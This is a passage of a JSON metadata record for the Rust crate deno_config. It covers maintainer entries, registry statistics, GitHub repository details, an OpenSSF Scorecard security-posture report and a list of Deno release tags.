Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-06-11T14:54:55.389Z","updated_at":"2026-06-11T14:54:55.389Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-06-11T14:54:55.435Z","updated_at":"2026-06-11T14:54:55.435Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":8134422,"name":"deno_config","ecosystem":"cargo","description":"Config file implementation for the Deno CLI","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":158,"first_release_published_at":"2023-08-23T14:04:20.242Z","latest_release_published_at":"2026-08-27T15:20:53.365Z","latest_release_number":"0.108.0","last_synced_at":"2026-09-07T22:55:18.367Z","created_at":"2023-08-23T14:10:42.630Z","updated_at":"2026-09-07T22:55:18.368Z","registry_url":"https://crates.io/crates/deno_config/","install_command":"cargo install deno_config","documentation_url":"https://docs.rs/deno_config/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitH